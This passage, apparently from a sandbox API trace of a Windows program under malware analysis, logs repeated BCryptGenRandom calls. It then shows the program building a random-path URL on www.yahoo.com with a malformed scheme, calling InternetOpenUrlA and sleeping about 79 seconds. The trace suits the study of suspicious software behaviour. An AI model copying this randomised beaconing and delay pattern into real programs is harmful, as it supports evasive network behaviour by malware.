hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a165d8, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a165d8) returned 0x0 [0189.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.890] GetProcessHeap () returned 0x440000 [0189.890] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0189.890] lstrcpyA (in: lpString1=0x472900, lpString2="cäg\x9cs://www.yahoo.com" | out: lpString1="cäg\x9cs://www.yahoo.com") returned="cäg\x9cs://www.yahoo.com" [0189.890] lstrcatA (in: lpString1="cäg\x9cs://www.yahoo.com", lpString2="/Sfo6jupu5J469PbnxxvE9e8tkpNbBsskpvj4L93f50pjslc/ai37mk8eulYPaaog1G4mhgtoyzgrNO4jIXefSy/qop6q6pp72p9u7lnqjmktnz8wjqjBGvn/" | out: lpString1="cäg\x9cs://www.yahoo.com/Sfo6jupu5J469PbnxxvE9e8tkpNbBsskpvj4L93f50pjslc/ai37mk8eulYPaaog1G4mhgtoyzgrNO4jIXefSy/qop6q6pp72p9u7lnqjmktnz8wjqjBGvn/") returned="cäg\x9cs://www.yahoo.com/Sfo6jupu5J469PbnxxvE9e8tkpNbBsskpvj4L93f50pjslc/ai37mk8eulYPaaog1G4mhgtoyzgrNO4jIXefSy/qop6q6pp72p9u7lnqjmktnz8wjqjBGvn/" [0189.890] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0189.890] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="cäg\x9cs://www.yahoo.com/Sfo6jupu5J469PbnxxvE9e8tkpNbBsskpvj4L93f50pjslc/ai37mk8eulYPaaog1G4mhgtoyzgrNO4jIXefSy/qop6q6pp72p9u7lnqjmktnz8wjqjBGvn/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0189.891] GetProcessHeap () returned 0x440000 [0189.891] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0189.891] GetProcessHeap () returned 0x440000 [0189.891] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16580 | out: hHeap=0x440000) returned 1 [0189.891] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0189.891] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0189.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0189.891] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0189.892] Sleep (dwMilliseconds=0x136a0) [0190.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0190.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.109] GetProcessHeap () returned 0x440000 [0190.109] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4900 [0190.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4901, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d4901) returned 0x0 [0190.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0190.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4926, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x4d4926) returned 0x0 [0190.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0190.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0190.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0190.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 